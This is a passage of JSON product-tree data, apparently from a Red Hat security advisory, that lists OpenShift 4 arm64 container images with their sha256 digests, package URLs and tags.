"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3A13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3Ad98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Af434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3Af5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3A3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3A47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3Af2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3A3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3Ac0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3Ac2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3A3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Ad17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3A446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ac185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Aab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Afb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Afb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Af51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Ac1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3Ad14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Acba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product": {
